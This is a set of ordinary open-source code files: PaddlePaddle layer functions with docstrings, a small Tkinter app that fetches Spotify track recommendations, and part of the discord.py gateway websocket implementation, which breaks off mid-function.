Variable: Output of deformable roi pooling is that, if position sensitive is False, input dimension equals to output dimension. If position sensitive is True,\
input dimension should be the result of output dimension divided by pooled height and pooled width.
Examples:
.. code-block:: python
# position_sensitive=True
import paddle.fluid as fluid
input = fluid.data(name="input",
shape=[2, 192, 64, 64],
dtype='float32')
rois = fluid.data(name="rois",
shape=[-1, 4],
dtype='float32',
lod_level=1)
trans = fluid.data(name="trans",
shape=[2, 384, 64, 64],
dtype='float32')
x = fluid.layers.deformable_roi_pooling(input=input,
rois=rois,
trans=trans,
no_trans=False,
spatial_scale=1.0,
group_size=(1, 1),
pooled_height=8,
pooled_width=8,
part_size=(8, 8),
sample_per_part=4,
trans_std=0.1,
position_sensitive=True)
# position_sensitive=False
import paddle.fluid as fluid
input = fluid.data(name="input",
shape=[2, 192, 64, 64],
dtype='float32')
rois = fluid.data(name="rois",
shape=[-1, 4],
dtype='float32',
lod_level=1)
trans = fluid.data(name="trans",
shape=[2, 384, 64, 64],
dtype='float32')
x = fluid.layers.deformable_roi_pooling(input=input,
rois=rois,
trans=trans,
no_trans=False,
spatial_scale=1.0,
group_size=(1, 1),
pooled_height=8,
pooled_width=8,
part_size=(8, 8),
sample_per_part=4,
trans_std=0.1,
position_sensitive=False)
"""
check_variable_and_dtype(input, 'input', ['float32', 'float64'],
'deformable_roi_pooling')
check_variable_and_dtype(rois, 'rois', ['float32', 'float64'],
'deformable_roi_pooling')
check_variable_and_dtype(trans, 'trans', ['float32', 'float64'],
'deformable_roi_pooling')
check_type(group_size, 'group_size', (list, tuple),
'deformable_roi_pooling')
if part_size is not None:
check_type(part_size, 'part_size', (list, tuple),
'deformable_roi_pooling')
input_channels = input.shape[1]
if position_sensitive == False:
output_channels = input_channels
else:
output_channels = input_channels / pooled_height / pooled_width
if part_size is None:
part_height = pooled_height
part_width = pooled_width
part_size = [part_height, part_width]
part_size = utils.convert_to_list(part_size, 2, 'part_size')
group_size = utils.convert_to_list(group_size, 2, 'group_size')
helper = LayerHelper('deformable_psroi_pooling', **locals())
dtype = helper.input_dtype()
output = helper.create_variable_for_type_inference(dtype)
top_count = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type="deformable_psroi_pooling",
inputs={"Input": input,
"ROIs": rois,
"Trans": trans},
outputs={"Output": output,
"TopCount": top_count},
attrs={
"no_trans": no_trans,
"spatial_scale": spatial_scale,
"output_dim": output_channels,
"group_size": group_size,
"pooled_height": pooled_height,
"pooled_width": pooled_width,
"part_size": part_size,
"sample_per_part": sample_per_part,
"trans_std": trans_std
})
return output
def shard_index(input, index_num, nshards, shard_id, ignore_value=-1):
"""
This operator recomputes the `input` indices according to the offset of the
shard. The length of the indices is evenly divided into N shards, and if
the `shard_id` matches the shard with the input index inside, the index is
recomputed on the basis of the shard offset, elsewise it is set to
`ignore_value`. The detail is as follows:
::
shard_size = (index_num + nshards - 1) // nshards
y = x % shard_size if x // shard_size == shard_id else ignore_value
NOTE: If the length of indices cannot be evely divided by the shard number,
the size of the last shard will be less than the calculated `shard_size`
Examples:
::
Input:
X.shape = [4, 1]
X.data = [[1], [6], [12], [19]]
index_num = 20
nshards = 2
ignore_value = -1
if shard_id == 0, we get:
Out.shape = [4, 1]
Out.data = [[1], [6], [-1], [-1]]
if shard_id == 1, we get:
Out.shape = [4, 1]
Out.data = [[-1], [-1], [2], [9]]
Args:
- **input** (Variable): Input indices, last dimension must be 1.
- **index_num** (scalar): An integer defining the range of the index.
- **nshards** (scalar): The number of shards
- **shard_id** (scalar): The index of the current shard
- **ignore_value** (scalar): An integer value out of sharded index range
Returns:
Variable: The sharded index of input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
batch_size = 32
label = fluid.data(name="label", shape=[batch_size, 1], dtype="int64")
shard_label = fluid.layers.shard_index(input=label,
index_num=20,
nshards=2,
shard_id=0)
"""
op_type = 'shard_index'
helper = LayerHelper(op_type, **locals())
if shard_id < 0 or shard_id >= nshards:
raise ValueError('The shard_id(%d) should be in [0, %d)' %
(shard_id, nshards))
out = helper.create_variable_for_type_inference(dtype=input.dtype)
helper.append_op(
type=op_type,
inputs={'X': [input]},
outputs={'Out': out},
attrs={
'index_num': index_num,
'nshards': nshards,
'shard_id': shard_id,
'ignore_value': ignore_value
},
stop_gradient=True)
return out
@templatedoc()
def hard_swish(x, threshold=6.0, scale=6.0, offset=3.0, name=None):
"""
This operator implements the hard_swish activation function.
Hard_swish is proposed in MobileNetV3, and performs better in computational stability and efficiency compared to swish function.
For more details please refer to: https://arxiv.org/pdf/1905.02244.pdf
The formula is as follows:
.. math::
out = \\frac{x * (min(max(0, x+offset), threshold))}{scale}
In the above equation:
``threshold`` and ``scale`` should be positive, ``offset`` can be positive or negative. It is recommended to use default parameters.
Args:
x (Variable): Input feature, multi-dimensional Tensor. The data type should be float32 or float64.
threshold (float, optional): The threshold in Relu function. Default: 6.0
scale (float, optional): The scale factor. Default: 6.0
offset (float, optional): The offset factor. Default: 3.0
name (str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: The output tensor with the same shape and data type as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
DATATYPE='float32'
x_data = np.array([i for i in range(1,5)]).reshape([1,1,4]).astype(DATATYPE)
x = fluid.data(name="x", shape=[None,1,4], dtype=DATATYPE)
y = fluid.layers.hard_swish(x)
place = fluid.CPUPlace()
#place = fluid.CUDAPlace(0)
exe = fluid.Executor(place)
out, = exe.run(feed={'x':x_data}, fetch_list=[y.name])
print(out) # [[0.66666667, 1.66666667,3., 4.]]
"""
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'],
'hard_swish')
helper = LayerHelper('hard_swish', **locals())
out = helper.create_variable_for_type_inference(dtype=x.dtype)
helper.append_op(
type='hard_swish',
inputs={'X': x},
outputs={'Out': out},
attrs={'threshold': threshold,
'scale': scale,
'offset': offset})
return out
def gather_tree(ids, parents):
"""
To be used after beam search. After beam search, we get selected ids at
each time step and the corresponding parents in the search tree. Both ids
and parents have the layout :attr:`[max_time, batch_size, beam_size]`. Then
:attr:`gather_tree` is used to backtrace from the last time step and
generate the full sequences by collecting selected ids.
Here is an example:
.. code-block:: text
Given:
ids = [[[2 2]
[6 1]]
[[3 9]
[6 1]]
[[0 1]
[9 0]]]
parents = [[[0 0]
[1 1]]
[[1 0]
[1 0]]
[[0 0]
[0 1]]]
Then:
gather_tree(ids, parents)
= [[[2 2]
[1 6]]
[[3 3]
[6 1]]
[[0 1]
[9 0]]]
Args:
ids(Variable): A Tensor with shape :attr:`[length, batch_size, beam_size]`
and data type :attr:`int32` or :attr:`int64`. It contains the selected
ids of all time steps.
parents(Variable): A Tensor with the same shape and data type as :attr:`ids`,
It contains the parents corresponding to selected ids when searching
among beams.
Returns:
Variable: A Tensor with the same shape and data type as :attr:`ids`. \
It contains the full sequences. The sequences are collected from \
:attr:`ids` by backtracing according to :attr:`parents`.
Examples:
.. code-block:: python
import paddle.fluid as fluid
ids = fluid.layers.data(name='ids',
shape=[5, 2, 2],
dtype='int64',
append_batch_size=False)
parents = fluid.layers.data(name='parents',
shape=[5, 2, 2],
dtype='int64',
append_batch_size=False)
final_sequences = fluid.layers.gather_tree(ids, parents)
"""
helper = LayerHelper('gather_tree', **locals())
out = helper.create_variable_for_type_inference(dtype=ids.dtype)
helper.append_op(
type="gather_tree",
inputs={"Ids": ids,
"Parents": parents},
outputs={"Out": out})
return out
@templatedoc()
def uniform_random(shape, dtype='float32', min=-1.0, max=1.0, seed=0):
"""
This OP initializes a variable with random values sampled from a
uniform distribution in the range [min, max).
Examples:
::
Input:
shape = [1, 2]
Output:
result=[[0.8505902, 0.8397286]]
Args:
shape (list|tuple|Variable): The shape of the output Tensor, if the shape is a list or tuple,
its elements can be an integer
or a Tensor with the shape [1], and the type of the Tensor must be int32 or int64.
If the shape is a Variable, it is a 1-D Tensor, and the type of the Tensor must be int32 or int64.
dtype(np.dtype|core.VarDesc.VarType|str, optional): The type of the output Tensor. Supported data types: float32, float64.
Default: float32.
min (float, optional): The lower bound on the range of random values to generate, the min is included in the range. Default -1.0.
max (float, optional): The upper bound on the range of random values to generate, the max is excluded in the range. Default 1.0.
seed (int, optional): Random seed used for generating samples. 0 means use a
seed generated by the system. Note that if seed is not 0, this
operator will always generate the same random numbers every time.
Default 0.
Returns:
Variable: A Tensor of the specified shape filled with uniform_random values.
Raises:
TypeError: The shape type should be list or tuple or variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
# example 1:
# attr shape is a list which doesn't contain tensor Variable.
result_1 = fluid.layers.uniform_random(shape=[3, 4])
# example 2:
# attr shape is a list which contains tensor Variable.
dim_1 = fluid.layers.fill_constant([1],"int64",3)
dim_2 = fluid.layers.fill_constant([1],"int32",5)
result_2 = fluid.layers.uniform_random(shape=[dim_1, dim_2])
# example 3:
# attr shape is a Variable, the data type must be int64 or int32.
var_shape = fluid.data(name='var_shape', shape=[2], dtype="int64")
result_3 = fluid.layers.uniform_random(var_shape)
var_shape_int32 = fluid.data(name='var_shape_int32', shape=[2], dtype="int32")
result_4 = fluid.layers.uniform_random(var_shape_int32)
"""
check_type(shape, 'shape', (list, tuple, Variable), 'uniform_random')
if not isinstance(dtype, core.VarDesc.VarType):
dtype = convert_np_dtype_to_dtype_(dtype)
check_dtype(dtype, 'dtype', ['float32', 'float64'], 'uniform_random')
def get_new_shape_tensor(list_shape):
new_shape_tensor = []
for dim in list_shape:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_shape_tensor.append(dim)
else:
assert (isinstance(dim, int))
temp_out = helper.create_variable_for_type_inference('int64')
fill_constant([1], 'int64', dim, force_cpu=True, out=temp_out)
new_shape_tensor.append(temp_out)
return new_shape_tensor
def get_attr_shape(list_shape):
unk_dim_idx = -1
attrs_shape = []
for dim_idx, dim_size in enumerate(list_shape):
if isinstance(dim_size, Variable):
attrs_shape.append(-1)
else:
attrs_shape.append(dim_size)
assert dim_size > 0, (
"Each dimension size given in shape must not be negative "
"except one unknown dimension.")
return attrs_shape
helper = LayerHelper("uniform_random", **locals())
inputs = dict()
attrs = {'seed': seed, 'min': min, 'max': max}
if in_dygraph_mode():
attrs['shape'] = shape
else:
if isinstance(shape, Variable):
shape.stop_gradient = True
inputs["ShapeTensor"] = shape
elif isinstance(shape, (list, tuple)):
assert len(shape) > 0, (
"The size of argument(shape) can't be zero.")
attrs["shape"] = get_attr_shape(shape)
if utils._contain_var(shape):
inputs['ShapeTensorList'] = get_new_shape_tensor(shape)
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="uniform_random", inputs=inputs, attrs=attrs,
outputs={"Out": out})
return helper.append_activation(out)
|
the-stack_0_3686 | from dotenv import load_dotenv
load_dotenv()
import spotipy
from spotipy.oauth2 import SpotifyClientCredentials
import tkinter as tk
import webbrowser
def open_spotify(url):
webbrowser.open(url, new = 2)
def create_label(text):
return tk.Label(master = frm_recommendations, text = text)
def create_button(text, url):
return tk.Button(master = frm_recommendations, text = text, command = lambda:open_spotify(url))
def clear(*args):
args.destroy()
def display_recommendations(response):
lbl_track_name = tk.Label(master = frm_recommendations, text = 'Track Name')
lbl_artist_name = tk.Label(master = frm_recommendations, text = 'Artist Name')
lbl_play_it = tk.Label(master = frm_recommendations, text = 'Play It')
lbl_track_name.grid(row = 0,column = 0)
lbl_artist_name.grid(row = 0,column = 1)
lbl_play_it.grid(row = 0,column = 2)
for idx, track in enumerate(response['tracks']):
lbl_track_name_recommended = create_label(track['name'])
lbl_track_name_recommended.grid(row = idx + 1, column = 0)
lbl_artist_name_recommended = create_label(track['artists'][0]['name'])
lbl_artist_name_recommended.grid(row = idx + 1, column = 1)
btn_plat_it_recommended = create_button('Play It', track['external_urls']['spotify'])
btn_plat_it_recommended.grid(row = idx + 1, column = 2, padx = 10)
def get_recommendations():
search = ent_search.get()
sp = spotipy.Spotify(client_credentials_manager = SpotifyClientCredentials ("#### enter your spotify client id ####","#### Get your secret client id here https://developer.spotify.com/dashboard/applications ####"))
result = sp.search(q = search, limit =1)
id_list = [result['tracks']['items'][0]['id']]
recommendations = sp.recommendations(seed_tracks = id_list, limit = 10)
display_recommendations(recommendations)
window = tk.Tk()
frm_search_field = tk.Frame(master = window, width = 100)
frm_recommendations = tk.Frame(master = window)
frm_search_field.pack()
frm_recommendations.pack()
ent_search = tk.Entry(master= frm_search_field, width =25)
btn_get_recommendations = tk.Button(master = frm_search_field, text = 'Get recommendations', command= get_recommendations)
ent_search.grid(row = 0,column = 0,pady = 10,padx = 10)
btn_get_recommendations.grid(row = 0,column = 1,pady = 10,padx = 10)
window.mainloop()
|
the-stack_0_3687 | """
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
from collections import namedtuple, deque
import concurrent.futures
import logging
import struct
import sys
import time
import threading
import traceback
import zlib
import aiohttp
from . import utils
from .activity import BaseActivity
from .enums import SpeakingState
from .errors import ConnectionClosed, InvalidArgument
_log = logging.getLogger(__name__)
__all__ = (
"DiscordWebSocket",
"KeepAliveHandler",
"VoiceKeepAliveHandler",
"DiscordVoiceWebSocket",
"ReconnectWebSocket",
)
class ReconnectWebSocket(Exception):
"""Signals to safely reconnect the websocket."""
def __init__(self, shard_id, *, resume=True):
self.shard_id = shard_id
self.resume = resume
self.op = "RESUME" if resume else "IDENTIFY"
class WebSocketClosure(Exception):
"""An exception to make up for the fact that aiohttp doesn't signal closure."""
pass
EventListener = namedtuple("EventListener", "predicate event result future")
class GatewayRatelimiter:
def __init__(self, count=110, per=60.0):
# The default is 110 to give room for at least 10 heartbeats per minute
self.max = count
self.remaining = count
self.window = 0.0
self.per = per
self.lock = asyncio.Lock()
self.shard_id = None
def is_ratelimited(self):
current = time.time()
if current > self.window + self.per:
return False
return self.remaining == 0
def get_delay(self):
current = time.time()
if current > self.window + self.per:
self.remaining = self.max
if self.remaining == self.max:
self.window = current
if self.remaining == 0:
return self.per - (current - self.window)
self.remaining -= 1
if self.remaining == 0:
self.window = current
return 0.0
async def block(self):
async with self.lock:
delta = self.get_delay()
if delta:
_log.warning(
"WebSocket in shard ID %s is ratelimited, waiting %.2f seconds",
self.shard_id,
delta,
)
await asyncio.sleep(delta)
class KeepAliveHandler(threading.Thread):
def __init__(self, *args, **kwargs):
ws = kwargs.pop("ws", None)
interval = kwargs.pop("interval", None)
shard_id = kwargs.pop("shard_id", None)
threading.Thread.__init__(self, *args, **kwargs)
self.ws = ws
self._main_thread_id = ws.thread_id
self.interval = interval
self.daemon = True
self.shard_id = shard_id
self.msg = "Keeping shard ID %s websocket alive with sequence %s."
self.block_msg = "Shard ID %s heartbeat blocked for more than %s seconds."
self.behind_msg = "Can't keep up, shard ID %s websocket is %.1fs behind."
self._stop_ev = threading.Event()
self._last_ack = time.perf_counter()
self._last_send = time.perf_counter()
self._last_recv = time.perf_counter()
self.latency = float("inf")
self.heartbeat_timeout = ws._max_heartbeat_timeout
def run(self):
while not self._stop_ev.wait(self.interval):
if self._last_recv + self.heartbeat_timeout < time.perf_counter():
_log.warning(
"Shard ID %s has stopped responding to the gateway. Closing and restarting.",
self.shard_id,
)
coro = self.ws.close(4000)
f = asyncio.run_coroutine_threadsafe(coro, loop=self.ws.loop)
try:
f.result()
except Exception:
_log.exception(
"An error occurred while stopping the gateway. Ignoring."
)
finally:
self.stop()
return
data = self.get_payload()
_log.debug(self.msg, self.shard_id, data["d"])
coro = self.ws.send_heartbeat(data)
f = asyncio.run_coroutine_threadsafe(coro, loop=self.ws.loop)
try:
# block until sending is complete
total = 0
while True:
try:
f.result(10)
break
except concurrent.futures.TimeoutError:
total += 10
try:
frame = sys._current_frames()[self._main_thread_id]
except KeyError:
msg = self.block_msg
else:
stack = "".join(traceback.format_stack(frame))
msg = f"{self.block_msg}\nLoop thread traceback (most recent call last):\n{stack}"
_log.warning(msg, self.shard_id, total)
except Exception:
self.stop()
else:
self._last_send = time.perf_counter()
def get_payload(self):
return {"op": self.ws.HEARTBEAT, "d": self.ws.sequence}
def stop(self):
self._stop_ev.set()
def tick(self):
self._last_recv = time.perf_counter()
def ack(self):
ack_time = time.perf_counter()
self._last_ack = ack_time
self.latency = ack_time - self._last_send
if self.latency > 10:
_log.warning(self.behind_msg, self.shard_id, self.latency)
class VoiceKeepAliveHandler(KeepAliveHandler):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.recent_ack_latencies = deque(maxlen=20)
self.msg = "Keeping shard ID %s voice websocket alive with timestamp %s."
self.block_msg = "Shard ID %s voice heartbeat blocked for more than %s seconds"
self.behind_msg = "High socket latency, shard ID %s heartbeat is %.1fs behind"
def get_payload(self):
return {"op": self.ws.HEARTBEAT, "d": int(time.time() * 1000)}
def ack(self):
ack_time = time.perf_counter()
self._last_ack = ack_time
self._last_recv = ack_time
self.latency = ack_time - self._last_send
self.recent_ack_latencies.append(self.latency)
class DiscordClientWebSocketResponse(aiohttp.ClientWebSocketResponse):
async def close(self, *, code: int = 4000, message: bytes = b"") -> bool:
return await super().close(code=code, message=message)
class DiscordWebSocket:
"""Implements a WebSocket for Discord's gateway v6.
Attributes
-----------
DISPATCH
Receive only. Denotes an event to be sent to Discord, such as READY.
HEARTBEAT
When received tells Discord to keep the connection alive.
When sent asks if your connection is currently alive.
IDENTIFY
Send only. Starts a new session.
PRESENCE
Send only. Updates your presence.
VOICE_STATE
Send only. Starts a new connection to a voice guild.
VOICE_PING
Send only. Checks ping time to a voice guild, do not use.
RESUME
Send only. Resumes an existing connection.
RECONNECT
Receive only. Tells the client to reconnect to a new gateway.
REQUEST_MEMBERS
Send only. Asks for the full member list of a guild.
INVALIDATE_SESSION
Receive only. Tells the client to optionally invalidate the session
and IDENTIFY again.
HELLO
Receive only. Tells the client the heartbeat interval.
HEARTBEAT_ACK
Receive only. Confirms receiving of a heartbeat. Not having it implies
a connection issue.
GUILD_SYNC
Send only. Requests a guild sync.
gateway
The gateway we are currently connected to.
token
The authentication token for discord.
"""
DISPATCH = 0
HEARTBEAT = 1
IDENTIFY = 2
PRESENCE = 3
VOICE_STATE = 4
VOICE_PING = 5
RESUME = 6
RECONNECT = 7
REQUEST_MEMBERS = 8
INVALIDATE_SESSION = 9
HELLO = 10
HEARTBEAT_ACK = 11
GUILD_SYNC = 12
def __init__(self, socket, *, loop):
self.socket = socket
self.loop = loop
# an empty dispatcher to prevent crashes
self._dispatch = lambda *args: None
# generic event listeners
self._dispatch_listeners = []
# the keep alive
self._keep_alive = None
self.thread_id = threading.get_ident()
# ws related stuff
self.session_id = None
self.sequence = None
self._zlib = zlib.decompressobj()
self._buffer = bytearray()
self._close_code = None
self._rate_limiter = GatewayRatelimiter()
@property
def open(self):
return not self.socket.closed
def is_ratelimited(self):
return self._rate_limiter.is_ratelimited()
def debug_log_receive(self, data, /):
self._dispatch("socket_raw_receive", data)
def log_receive(self, _, /):
pass
@classmethod
async def from_client(
cls,
client,
*,
initial=False,
gateway=None,
shard_id=None,
session=None,
sequence=None,
resume=False,
):
"""Creates a main websocket for Discord from a :class:`Client`.
This is for internal use only.
"""
gateway = gateway or await client.http.get_gateway()
socket = await client.http.ws_connect(gateway)
ws = cls(socket, loop=client.loop)
# dynamically add attributes needed
ws.token = client.http.token
ws._connection = client._connection
ws._discord_parsers = client._connection.parsers
ws._dispatch = client.dispatch
ws.gateway = gateway
ws.call_hooks = client._connection.call_hooks
ws._initial_identify = initial
ws.shard_id = shard_id
ws._rate_limiter.shard_id = shard_id
ws.shard_count = client._connection.shard_count
ws.session_id = session
ws.sequence = sequence
ws._max_heartbeat_timeout = client._connection.heartbeat_timeout
if client._enable_debug_events:
ws.send = ws.debug_send
ws.log_receive = ws.debug_log_receive
client._connection._update_references(ws)
_log.debug("Created websocket connected to %s", gateway)
# poll event for OP Hello
await ws.poll_event()
if not resume:
await ws.identify()
return ws
await ws.resume()
return ws
def wait_for(self, event, predicate, result=None):
"""Waits for a DISPATCH'd event that meets the predicate.
Parameters
-----------
event: :class:`str`
The event name in all upper case to wait for.
predicate
A function that takes a data parameter to check for event
properties. The data parameter is the 'd' key in the JSON message.
result
A function that takes the same data parameter and executes to send
the result to the future. If ``None``, returns the data.
Returns
--------
asyncio.Future
A future to wait for.
"""
future = self.loop.create_future()
entry = EventListener(
event=event, predicate=predicate, result=result, future=future
)
self._dispatch_listeners.append(entry)
return future
async def identify(self):
"""Sends the IDENTIFY packet."""
payload = {
"op": self.IDENTIFY,
"d": {
"token": self.token,
"properties": {
"$os": sys.platform,
"$browser": "discord.py",
"$device": "discord.py",
"$referrer": "",
"$referring_domain": "",
},
"compress": True,
"large_threshold": 250,
"v": 3,
},
}
if self.shard_id is not None and self.shard_count is not None:
payload["d"]["shard"] = [self.shard_id, self.shard_count]
state = self._connection
if state._activity is not None or state._status is not None:
payload["d"]["presence"] = {
"status": state._status,
"game": state._activity,
"since": 0,
"afk": False,
}
if state._intents is not None:
payload["d"]["intents"] = state._intents.value
await self.call_hooks(
"before_identify", self.shard_id, initial=self._initial_identify
)
await self.send_as_json(payload)
_log.info("Shard ID %s has sent the IDENTIFY payload.", self.shard_id)
async def resume(self):
"""Sends the RESUME packet."""
payload = {
"op": self.RESUME,
"d": {
"seq": self.sequence,
"session_id": self.session_id,
"token": self.token,
},
}
await self.send_as_json(payload)
_log.info("Shard ID %s has sent the RESUME payload.", self.shard_id)
async def received_message(self, msg, /):
if type(msg) is bytes:
self._buffer.extend(msg)
if len(msg) < 4 or msg[-4:] != b"\x00\x00\xff\xff":
return
msg = self._zlib.decompress(self._buffer)
msg = msg.decode("utf-8")
self._buffer = bytearray()
self.log_receive(msg)
msg = utils._from_json(msg)
self._dispatch("socket_response")
_log.debug("For Shard ID %s: WebSocket Event: %s", self.shard_id, msg)
event = msg.get("t")
if event:
self._dispatch("socket_event_type", event)
op = msg.get("op")
data = msg.get("d")
seq = msg.get("s")
if seq is not None:
self.sequence = seq
if self._keep_alive:
self._keep_alive.tick()
if op != self.DISPATCH:
if op == self.RECONNECT:
# "reconnect" can only be handled by the Client
# so we terminate our connection and raise an
# internal exception signalling to reconnect.
_log.debug("Received RECONNECT opcode.")
await self.close()
raise ReconnectWebSocket(self.shard_id)
if op == self.HEARTBEAT_ACK:
if self._keep_alive:
self._keep_alive.ack()
return
if op == self.HEARTBEAT:
if self._keep_alive:
beat = self._keep_alive.get_payload()
await self.send_as_json(beat)
return
if op == self.HELLO:
interval = data["heartbeat_interval"] / 1000.0
self._keep_alive = KeepAliveHandler(
ws=self, interval=interval, shard_id=self.shard_id
)
# send a heartbeat immediately
await self.send_as_json(self._keep_alive.get_payload())
self._keep_alive.start()
return
if op == self.INVALIDATE_SESSION:
if data is True:
await self.close()
raise ReconnectWebSocket(self.shard_id)
self.sequence = None
self.session_id = None
_log.info("Shard ID %s session has been invalidated.", self.shard_id)
await self.close(code=1000)
raise ReconnectWebSocket(self.shard_id, resume=False)
_log.warning("Unknown OP code %s.", op)
return
if event == "READY":
self._trace = trace = data.get("_trace", [])
self.sequence = msg["s"]
self.session_id = data["session_id"]
# pass back shard ID to ready handler
data["__shard_id__"] = self.shard_id
_log.info(
"Shard ID %s has connected to Gateway: %s (Session ID: %s).",
self.shard_id,
", ".join(trace),
self.session_id,
)
elif event == "RESUMED":
self._trace = trace = data.get("_trace", [])
# pass back the shard ID to the resumed handler
data["__shard_id__"] = self.shard_id
_log.info(
"Shard ID %s has successfully RESUMED session %s under trace %s.",
self.shard_id,
self.session_id,
", ".join(trace),
)
try:
func = self._discord_parsers[event]
except KeyError:
_log.debug("Unknown event %s.", event)
else:
func(data)
# remove the dispatched listeners
removed = []
for index, entry in enumerate(self._dispatch_listeners):
if entry.event != event:
continue
future = entry.future
if future.cancelled():
removed.append(index)
continue
try:
valid = entry.predicate(data)
except Exception as exc:
future.set_exception(exc)
removed.append(index)
else:
if valid:
ret = data if entry.result is None else entry.result(data)
future.set_result(ret)
removed.append(index)
for index in reversed(removed):
del self._dispatch_listeners[index]
@property
def latency(self):
""":class:`float`: Measures latency between a HEARTBEAT and a HEARTBEAT_ACK in seconds."""
heartbeat = self._keep_alive
return float("inf") if heartbeat is None else heartbeat.latency
def _can_handle_close(self):
code = self._close_code or self.socket.close_code
return code not in (1000, 4004, 4010, 4011, 4012, 4013, 4014)
async def poll_event(self):
"""Polls for a DISPATCH event and handles the general gateway loop.
Raises
------
ConnectionClosed
The websocket connection was terminated for unhandled reasons.
"""
try:
msg = await self.socket.receive(timeout=self._max_heartbeat_timeout)
if msg.type is aiohttp.WSMsgType.TEXT:
await self.received_message(msg.data)
elif msg.type is aiohttp.WSMsgType.BINARY:
await self.received_message(msg.data)
elif msg.type is aiohttp.WSMsgType.ERROR:
_log.debug("Received %s", msg)
raise msg.data
elif msg.type in (
aiohttp.WSMsgType.CLOSED,
aiohttp.WSMsgType.CLOSING,
aiohttp.WSMsgType.CLOSE,
):
_log.debug("Received %s", msg)
raise WebSocketClosure
except (asyncio.TimeoutError, WebSocketClosure) as e:
# Ensure the keep alive handler is closed
if self._keep_alive:
self._keep_alive.stop()
self._keep_alive = None
if isinstance(e, asyncio.TimeoutError):
_log.info("Timed out receiving packet. Attempting a reconnect.")
raise ReconnectWebSocket(self.shard_id) from None
code = self._close_code or self.socket.close_code
if self._can_handle_close():
_log.info("Websocket closed with %s, attempting a reconnect.", code)
raise ReconnectWebSocket(self.shard_id) from None
else:
_log.info("Websocket closed with %s, cannot reconnect.", code)
raise ConnectionClosed(
self.socket, shard_id=self.shard_id, code=code
) from None
async def debug_send(self, data, /):
await self._rate_limiter.block()
self._dispatch("socket_raw_send", data)
await self.socket.send_str(data)
async def send(self, data, /):
await self._rate_limiter.block()
await self.socket.send_str(data)
async def send_as_json(self, data):
try:
await self.send(utils._to_json(data))
except RuntimeError as exc:
if not self._can_handle_close():
raise ConnectionClosed(self.socket, shard_id=self.shard_id) from exc
async def send_heartbeat(self, data):
# This bypasses the rate limit handling code since it has a higher priority
try:
await self.socket.send_str(utils._to_json(data))
except RuntimeError as exc:
if not self._can_handle_close():
raise ConnectionClosed(self.socket, shard_id=self.shard_id) from exc
async def change_presence(self, *, activity=None, status=None, since=0.0):
if activity is not None:
if not isinstance(activity, BaseActivity):
raise InvalidArgument("activity must derive from BaseActivity.")
activity = [activity.to_dict()]
else:
activity = []
if status == "idle":
since = int(time.time() * 1000)
payload = {
"op": self.PRESENCE,
"d": {
"activities": activity,
"afk": False,
"since": since,
"status": status,
},
}
sent = utils._to_json(payload)
_log.debug('Sending "%s" to change status', sent)
await self.send(sent)
async def request_chunks(
self, guild_id, query=None, *, limit, user_ids=None, presences=False, nonce=None
):
payload = {
"op": self.REQUEST_MEMBERS,
"d": {"guild_id": guild_id, "presences": presences, "limit": limit},
}
if nonce:
payload["d"]["nonce"] = nonce
if user_ids:
payload["d"]["user_ids"] = user_ids
if query is not None:
payload["d"]["query"] = query
await self.send_as_json(payload)
async def voice_state(self, guild_id, channel_id, self_mute=False, self_deaf=False):
payload = {
"op": self.VOICE_STATE,
"d": {
"guild_id": guild_id,
"channel_id": channel_id,
"self_mute": self_mute,
"self_deaf": self_deaf,
},
}
_log.debug("Updating our voice state to %s.", payload)
await self.send_as_json(payload)
async def close(self, code=4000):
if self._keep_alive:
self._keep_alive.stop()
self._keep_alive = None
self._close_code = code
await self.socket.close(code=code)
class DiscordVoiceWebSocket:
"""Implements the websocket protocol for handling voice connections.
Attributes
-----------
IDENTIFY
Send only. Starts a new voice session.
SELECT_PROTOCOL
Send only. Tells discord what encryption mode and how to connect for voice.
READY
Receive only. Tells the websocket that the initial connection has completed.
HEARTBEAT
Send only. Keeps your websocket connection alive.
SESSION_DESCRIPTION
Receive only. Gives you the secret key required for voice.
SPEAKING
Send only. Notifies the client if you are currently speaking.
HEARTBEAT_ACK
Receive only. Tells you your heartbeat has been acknowledged.
RESUME
Sent only. Tells the client to resume its session.
HELLO
Receive only. Tells you that your websocket connection was acknowledged.
RESUMED
Sent only. Tells you that your RESUME request has succeeded.
CLIENT_CONNECT
Indicates a user has connected to voice.
CLIENT_DISCONNECT
Receive only. Indicates a user has disconnected from voice.
"""
IDENTIFY = 0
SELECT_PROTOCOL = 1
READY = 2
HEARTBEAT = 3
SESSION_DESCRIPTION = 4
SPEAKING = 5
HEARTBEAT_ACK = 6
RESUME = 7
HELLO = 8
RESUMED = 9
CLIENT_CONNECT = 12
CLIENT_DISCONNECT = 13
def __init__(self, socket, loop, *, hook=None):
self.ws = socket
self.loop = loop
self._keep_alive = None
self._close_code = None
self.secret_key = None
if hook:
self._hook = hook
async def _hook(self, *args):
pass
async def send_as_json(self, data):
_log.debug("Sending voice websocket frame: %s.", data)
await self.ws.send_str(utils._to_json(data))
send_heartbeat = send_as_json
async def resume(self):
state = self._connection
payload = {
